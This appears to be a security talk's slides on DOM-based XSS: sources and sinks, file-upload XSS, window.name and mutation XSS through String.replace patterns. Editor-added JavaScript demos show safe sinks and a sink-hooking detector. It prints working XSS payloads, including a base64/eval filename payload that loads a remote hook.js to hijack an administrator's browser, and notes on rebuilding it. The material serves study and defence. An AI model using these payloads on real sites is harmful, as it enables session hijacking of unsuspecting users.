5. DOM XSS
A different kind of XSS
The attacker's payload changes the DOM inside the browser; the
payload never has to reach the server.
Server-side monitoring (logs, WAF, IDS) may therefore never
see the issue.
Hello World in DOM XSS:
<script>
  // source: the URL fragment is attacker-controlled and is not sent to the server
  var name = document.location.hash.slice(1);
  // sink: document.write parses the string as HTML, so markup in the fragment is rendered and executed
  document.write(name);
</script>
6. Sources and Sinks
Source: entry point for untrusted data (location.hash, location.search,
document.referrer, window.name, postMessage data)
Sink: the place where the untrusted data is used to change the DOM or
execute code (innerHTML, document.write, eval, location assignment)
Fundamental problem: data ("string") → code
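The Hello World from slide 5 and the source/sink vocabulary from slide 6, modelled outside a browser as an added example (editor's code, not from the slides). The URL is constructed sample input; `readFragmentSource` assumes the application decodes the fragment itself (common in hash-routed single-page apps), because browsers and Node's WHATWG URL parser percent-encode `<`, `>`, `"`, backtick and space in the fragment before the page ever sees it.

```javascript
// Added example (editor's, not from the slides): the Hello World above,
// modelled without a browser. constructedUrl is sample input.

// Source: the fragment is attacker-controlled and never sent to the server.
// The decode step is an assumption about the app (hash-routed SPAs do it);
// without it, browsers hand over < > " ` and space percent-encoded.
function readFragmentSource(url) {
  return decodeURIComponent(new URL(url).hash.slice(1));
}

// Escaping for text and double-quoted attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable sink, stands in for document.write / innerHTML: markup is parsed.
function renderHtmlSink(untrusted) {
  return '<h1>Hello ' + untrusted + '</h1>';
}

// Safe sink, stands in for textContent: the payload stays inert text.
function renderTextSink(untrusted) {
  return '<h1>Hello ' + escapeHtml(untrusted) + '</h1>';
}

// Check used below: does the rendered markup contain an img tag with onerror?
function containsActiveImg(html) {
  return /<img\b[^>]*\bonerror\s*=/i.test(html);
}

const constructedUrl = 'https://app.example/profile#<img src=x onerror=alert(1)>';
const sampleName = readFragmentSource(constructedUrl);
console.log('source value :', sampleName);
console.log('html sink    :', renderHtmlSink(sampleName), containsActiveImg(renderHtmlSink(sampleName)));
console.log('text sink    :', renderTextSink(sampleName), containsActiveImg(renderTextSink(sampleName)));
```

The same string flows through both sinks; only the sink decides whether it is data or markup, which is the "string → code" problem in one picture.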
8. File Upload XSS
A DOM XSS was found in the authenticated section of the
application
The uploaded file (its name, as rendered by the application) was
changing the DOM
It was rated a low-priority bug
Reasons:
The bug exists only in the authenticated section, so
users can only attack themselves.
Filenames cannot contain special characters, so the
attack cannot be weaponized.
9. File Upload XSS
Filename that was uploaded:
<img src=a onerror='eval2=eval;eval2(atob("eCA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0JykpOyB4LnNyYz0naHR0cDovLzEyNy4wLjAuMTozMjAwL2hvb2suanMn"))'>.JPG
The base64 decodes to:
x = document.getElementsByTagName('body')[0].appendChild(document.createElement('script')); x.src='http://127.0.0.1:3200/hook.js'
This led to control of the administrator's browser (the injected
script tag loads hook.js in the administrator's session).
The application allowed power users to upload files from a USB
stick.
JavaScript functions solved the special-character problem: atob()
keeps the characters a filename cannot carry (such as / and :)
inside the base64, and eval() runs the decoded code.
Understood a unique behavior of eval(): eval2 = eval is an indirect
eval call, which runs the code in global scope.
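The payload from slide 9, decoded and checked, as an added example (editor's code, not from the slides). It shows which characters the raw hook script would have forced into the filename, that the slide's base64 carries none of them, and the indirect-eval behaviour that `eval2 = eval` relies on. The forbidden-character set is the Windows filename rule and is an assumption about the upload policy; `buildFilename` and `evalScopeDemo` are helpers written for this example.

```javascript
// Added example (editor's, not from the slides): decode the file-name
// payload, check which characters it keeps out of the file name, and show
// why eval2 = eval matters. FORBIDDEN_IN_FILENAME is the Windows rule and
// an assumption about the target's upload policy.

// The base64 from the slide, joined back into one string.
const SLIDE_BASE64 =
  'eCA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQo' +
  'ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0JykpOyB4LnNyYz0naHR0cDovLzEyNy4wLjAu' +
  'MTozMjAwL2hvb2suanMn';

// The payload uses atob(); Buffer is used here so it runs on any Node version.
function decodePayload(b64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

// Characters a Windows file name cannot contain (assumed upload constraint).
const FORBIDDEN_IN_FILENAME = new Set(['\\', '/', ':', '*', '?', '"', '<', '>', '|']);

// Distinct forbidden characters a string would put into the file name.
function forbiddenChars(s) {
  return [...new Set([...s].filter((c) => FORBIDDEN_IN_FILENAME.has(c)))];
}

// The complete slide payload as one file name; the outer tag itself still
// needs < > and ", which is why the file had to arrive from a USB stick
// rather than through a form that enforces the filename rule.
function buildFilename(b64) {
  return '<img src=a onerror=\'eval2=eval;eval2(atob("' + b64 + '"))\'>.JPG';
}

// eval2 = eval is an *indirect* eval: the code runs in global scope, so the
// payload's "x = ..." ends up on window instead of in the handler's scope.
// A direct eval(code) binds "var probe" inside this function (or inside
// the eval itself in strict mode); either way it is not global.
function evalScopeDemo(indirect) {
  const code = 'var probe = 42;';
  if (indirect) {
    const eval2 = eval;
    eval2(code);
  } else {
    eval(code);
  }
  const seenGlobally = globalThis.probe === 42;
  delete globalThis.probe;
  return seenGlobally ? 'global' : 'local';
}

const hookJs = decodePayload(SLIDE_BASE64);
console.log('decoded      :', hookJs);
console.log('raw JS needs :', forbiddenChars(hookJs));          // ':' and '/'
console.log('base64 needs :', forbiddenChars(SLIDE_BASE64));    // none for this string
console.log('outer tag    :', forbiddenChars(buildFilename(SLIDE_BASE64)));
console.log('direct eval  :', evalScopeDemo(false), '/ indirect eval:', evalScopeDemo(true));
```

Caveat when reusing the trick: the standard base64 alphabet includes `/` and `+`, so a different hook URL can produce a base64 string that reintroduces `/`; the slide's string happens to contain neither. `atob()` does not accept the base64url alphabet, so the encoded text has to be checked, not assumed.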
10. window.name
Gets/sets the name of the window (also readable as the plain global "name").
Cross-domain exploit: window.name is set by one origin and is still
readable after navigating to another, so it arrives already
attacker-controlled.
Any sink using the tainted property can now create DOM XSS.
Yahoo DOM XSS → https://www.exploit-db.com/docs/24109.pdf
Can be used to set global variables → control flow
12. JavaScript Template Engines
Data: could be JSON
Template engine pattern: the input is filtered, then the template
engine replaces the placeholder pattern with the filtered content.
Filters don't know about less prevalent bypasses like mutation XSS.
Credits: Mario Heiderich, Nafeez Ahmed
https://cure53.de/fp170.pdf
13. Mutation XSS
ECMAScript String.prototype.replace is the problem
When the replacement string contains $` (dollar + backtick), replace()
inserts the portion of the input that precedes the matched substring
($' inserts the portion that follows it, $& the match itself).
This lets us recreate a new image tag out of the template's own markup;
all we need to add are the attributes.
https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/replace
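The template-engine pattern from slide 12 and the $` trick from slide 13 in one toy engine, as an added example (editor's code, not from the slides or the cure53 report). Template, filter and payload are constructed for the illustration; `renderNaive`, `renderSafe` and `replacementPatterns` are names chosen here.

```javascript
// Added example (editor's, not from the slides or the cure53 report): a toy
// template engine that filters the value and then hands it to
// String.prototype.replace as a replacement *string*. Template, filter and
// payload are constructed for this illustration.

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: replace() interprets $` $' $& $$ (and $1..$99) in the
// replacement string *after* the filter has run.
function renderNaive(template, values) {
  let out = template;
  for (const [key, value] of Object.entries(values)) {
    out = out.replace('{{' + key + '}}', escapeHtml(value));
  }
  return out;
}

// Fixed: a replacer function's return value is inserted verbatim, replace()
// never scans it for $-patterns.
function renderSafe(template, values) {
  let out = template;
  for (const [key, value] of Object.entries(values)) {
    out = out.replace('{{' + key + '}}', () => escapeHtml(value));
  }
  return out;
}

// Defensive check for code review or input triage: which replace()
// special patterns does a value carry?
function replacementPatterns(value) {
  return value.match(/\$(?:[`'&$]|\d{1,2}|<[^>]*>)/g) || [];
}

const TEMPLATE = '<img src=avatar.png alt="{{alt}}">';
// $` re-emits the text before the match, i.e. <img src=avatar.png alt="
// None of $ ` x = ( ) is HTML-special, so the filter passes the value through.
// The copied closing quote ends the first alt value; the rest is parsed
// (leniently) as further attributes on the tag, onerror among them.
const PAYLOAD = '$`x onerror=alert(1) z';

console.log(renderNaive(TEMPLATE, { alt: PAYLOAD }));
console.log(renderSafe(TEMPLATE, { alt: PAYLOAD }));
console.log(replacementPatterns(PAYLOAD));
```

The naive output is `<img src=avatar.png alt="<img src=avatar.png alt="x onerror=alert(1) z">`: the filter did its job on the value, and the markup still came from the template itself. The fix is the replacer function; splitting on the placeholder and joining with the escaped value works too, since neither path interprets `$` sequences.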
14. How Do We Automate
Attack surface is large
The JS is compressed and uglified
Manual verification takes time.
Flow identification is easier.
Solution: Hookish https://github.com/skepticfx/hookish
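The hooking idea behind runtime triage, as an added example that is editor's code, not Hookish itself and not from the slides: values read from sources are recorded, sink methods and setters are wrapped, and every call that carries a recorded value is reported as source → sink. It also plays through the window.name flow from slide 10. `FakeElement` and `makeFakeBrowser` stand in for the browser so it runs under Node; in a page the same `hookMethod`/`hookSetter` would be pointed at `document` and `Element.prototype`. One caveat for the window.name source: current Chromium and Firefox reset window.name on cross-site top-level navigations, so the cross-domain step works as described mainly in older browsers and in same-site cases.

```javascript
// Added example (editor's; not the slides' code and not Hookish): wrap DOM
// sinks and report calls that carry a value read from a known source.
// FakeElement / makeFakeBrowser are constructed stand-ins for the browser.

const observedSources = new Map(); // source label -> value the page read
const findings = [];               // { source, sink, sample }

function recordSource(label, value) {
  if (typeof value === 'string' && value.length >= 3) observedSources.set(label, value);
}

function checkSink(sinkLabel, value) {
  if (typeof value !== 'string') return;
  for (const [label, taint] of observedSources) {
    if (value.includes(taint)) {
      findings.push({ source: label, sink: sinkLabel, sample: value.slice(0, 80) });
    }
  }
}

// Wrap a method sink such as document.write.
function hookMethod(obj, method, sinkLabel) {
  const original = obj[method];
  obj[method] = function (...args) {
    args.forEach((a) => checkSink(sinkLabel, a));
    return original.apply(this, args);
  };
}

// Wrap an accessor sink such as Element.prototype.innerHTML.
function hookSetter(proto, prop, sinkLabel) {
  const desc = Object.getOwnPropertyDescriptor(proto, prop);
  Object.defineProperty(proto, prop, {
    configurable: true,
    enumerable: desc.enumerable,
    get: desc.get,
    set(value) {
      checkSink(sinkLabel, value);
      desc.set.call(this, value);
    },
  });
}

// Fresh stand-ins per run so hooks are never installed twice on one prototype.
function makeFakeBrowser() {
  class Element {
    constructor() { this.html = ''; }
    get innerHTML() { return this.html; }
    set innerHTML(v) { this.html = String(v); }
  }
  const written = [];
  return {
    window: { name: '' },
    document: { write(s) { written.push(String(s)); }, written },
    Element,
  };
}

// Scenario: attacker.example sets window.name and navigates to the victim;
// the victim page reads window.name into two sinks and one harmless use.
function runScenario() {
  observedSources.clear();
  findings.length = 0;
  const b = makeFakeBrowser();
  hookMethod(b.document, 'write', 'document.write');
  hookSetter(b.Element.prototype, 'innerHTML', 'Element.innerHTML');

  // attacker page: window.name = payload; location = 'https://victim.example/';
  b.window.name = '<img src=x onerror=alert(document.domain)>';

  // victim page, hooks already installed (e.g. from a content script):
  recordSource('window.name', b.window.name);
  b.document.write('<h1>Welcome ' + b.window.name + '</h1>'); // flagged
  const banner = new b.Element();
  banner.innerHTML = b.window.name;                            // flagged
  const counter = new b.Element();
  counter.innerHTML = b.window.name.length + ' chars';         // not flagged
  return findings.map((f) => f.source + ' -> ' + f.sink);
}

console.log(runScenario());
```

Substring matching is deliberately crude: it misses values that are transformed between source and sink (split, decoded, re-encoded), which is where a real tool like Hookish and manual review still earn their keep, but it turns a pile of uglified JS into a short list of concrete source → sink pairs to verify first.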